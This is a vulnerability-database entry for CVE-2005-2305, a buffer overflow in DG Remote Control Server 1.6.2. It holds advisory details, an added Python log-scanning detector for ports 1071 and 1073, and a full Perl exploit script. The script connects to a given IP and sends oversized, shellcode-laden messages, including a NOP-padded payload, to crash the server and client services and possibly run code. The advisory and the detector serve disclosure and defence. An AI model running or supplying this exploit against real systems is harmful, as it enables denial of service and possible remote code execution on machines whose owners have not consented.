DG Remote Control Server Denial of Service Vulnerability

Vulnerability ID: 1108936
Vulnerability type: Buffer overflow
Published: 2005-07-15
Updated: 2005-10-20
CVE ID: CVE-2005-2305
CNNVD ID: CNNVD-200507-229
Platform: Windows
CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/1107
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-229
|Details
DG Remote Control Server is remote control server software. DG Remote Control Server 1.6.2 contains a denial-of-service vulnerability. A remote attacker can send long messages to TCP port 1071 or 1073, causing a denial of service (crash or CPU consumption) and possibly arbitrary code execution. The cause of this vulnerability may be a buffer overflow.
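The advisory gives only two concrete signals a defender can act on: the affected TCP ports (1071 and 1073) and "long messages". The following Python is an added detection example, not part of the original advisory or of the exploit below. It scans constructed connection-log lines (the line format, the 512-byte threshold and the assumption that the control channel normally carries short text commands are all assumptions made for this example) and flags traffic to the affected ports that is either oversized or not plain text.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Ports named in the advisory (CVE-2005-2305).
AFFECTED_PORTS = {1071, 1073}
# Assumed threshold for this example: the advisory gives no length, it only
# says "long messages"; the published exploit sends roughly 3 KB.
MAX_MESSAGE_LEN = 512

# Assumed log line format (constructed for this example), e.g.
# 2005-07-15T10:00:01 10.0.0.5:40231 -> 10.0.0.9:1071 len=14 first=7265626f6f74
# "first" is a hex dump of the leading payload bytes.
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
    r" len=(?P<len>\d+)(?: first=(?P<first>[0-9a-fA-F]*))?$"
)


@dataclass
class Finding:
    ts: str
    src: str
    dport: int
    length: int
    reason: str


def _is_text(payload: bytes) -> bool:
    """True if every byte is printable ASCII or common whitespace."""
    return all(0x20 <= b < 0x7F or b in b"\r\n\t" for b in payload)


def check_record(line: str) -> Optional[Finding]:
    """Apply both heuristics to one log line; None if nothing is suspicious."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None  # unparseable line: ignored here, worth counting in production
    dport = int(m.group("dport"))
    if dport not in AFFECTED_PORTS:
        return None
    length = int(m.group("len"))
    preview = bytes.fromhex(m.group("first") or "")
    reasons = []
    # Heuristic 1: the advisory's own signal, an unusually long message.
    if length > MAX_MESSAGE_LEN:
        reasons.append(f"oversized message ({length} > {MAX_MESSAGE_LEN} bytes)")
    # Heuristic 2 (assumption): the control channel carries text commands,
    # so raw binary in the first bytes is out of profile.
    if preview and not _is_text(preview):
        reasons.append("non-text payload on text control port")
    if not reasons:
        return None
    return Finding(m.group("ts"), m.group("src"), dport, length, "; ".join(reasons))


def scan(log: str) -> List[Finding]:
    """Scan a multi-line log and return all findings in order."""
    return [f for f in (check_record(line) for line in log.splitlines()) if f]


# Constructed sample log: a short text command, an oversized binary message to
# the server port, a short binary message to the client port, and unrelated
# HTTP traffic that must be ignored.
SAMPLE_LOG = """\
2005-07-15T10:00:01 10.0.0.5:40231 -> 10.0.0.9:1071 len=14 first=7265626f6f747c4c4f474f46467c
2005-07-15T10:00:02 10.0.0.5:40232 -> 10.0.0.9:1071 len=3114 first=7265626f6f74eb035aeb05e8f8ffffff
2005-07-15T10:00:03 10.0.0.5:40233 -> 10.0.0.9:1073 len=212 first=eb6e5e29c089461040
2005-07-15T10:00:04 10.0.0.5:40234 -> 10.0.0.9:80 len=4096 first=474554202f
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.src} -> :{f.dport} len={f.length}: {f.reason}")
```

Run as a script it reports the second and third sample lines. The length rule alone would miss the smaller message to port 1073, which is why the text-profile rule is kept as a second signal; tune the threshold to the real command sizes seen on your own network before deploying either.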
|Exploit
#!/usr/local/bin/perl
#
#  Remote Control Server DOS Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
#
# Sends one oversized message to the server port (1071) and one
# binary message to the client port (1073), as described in the advisory.

$ARGC=@ARGV;
if ($ARGC !=1) {
    print "\n";
    print " Remote Control Server DOS Exploit\n";
    print "------------------------------------\n\n";
    print "Usage: $0 [remote IP]\n";
    print "Exam: $0 127.0.0.1\n";
    exit;
}
use Socket;

my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1071";
print "\n";
print "[+] Connect to $remote..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

# First connection: server port 1071
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build server sploit..\n";
sleep(3);
# Payload bytes as published; the oversized length is what triggers the crash.
$sploit = "\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xec\x8b\xc2\x83\xc0\x18\x33\xc9";
$sploit=$sploit . "\x66\xb9\xb3\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\xaa\x59";
$sploit=$sploit . "\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a\x5b\xa4";
$sploit=$sploit . "\xcb\x27\x51\x99\xd5\x99\x66\x8f\xaa\x59\xc9\x27\x09\x98\xd5\x99\x66";
$sploit=$sploit . "\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";

print "[+] Attacking server..\n";
sleep(2);
# "reboot" command, padded with NOPs to 3096 bytes, followed by the "|LOGOFF|" token.
$msg = "reboot" . $sploit . "\x90" x (3096 - length($sploit)) . "\xe8\xf1\xc5\x05" . "|LOGOFF|";
print $msg;    # echoes the raw message to the terminal (as in the original)
send(SOCK, $msg, 0) or die "Cannot send query: $!";
print "DONE\n";
print "[+] Server D0s'ed\n";
sleep(1);
close(SOCK);

# Second connection: client port 1073
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port1 = "1073";

print "[+] Connect to Client server..\n";

$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port1, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";

socket(SOCK1, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK1, $paddr) or die "Error: $!";

print "[+] Connected\n";
print "[+] Build client Spl0it..\n";
sleep(3);

# Binary message for the client port, bytes as published.
$dos =
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";


print "[+] Attacking client..\n";
sleep(2);

print $dos;    # echoes the raw message to the terminal (as in the original)
send(SOCK1, $dos, 0) or die "Cannot send query: $!";

print "DONE\n";
print "[+] Client D0s'ed\n";
sleep(1);
close(SOCK1);
exit;

# milw0rm.com [2005-07-15]
|References

Source: BID
Name: 14263
Link: http://www.securityfocus.com/bid/14263
Source: MISC
Link: http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=72
Source: SECUNIA
Name: 16070
Link: http://secunia.com/advisories/16070
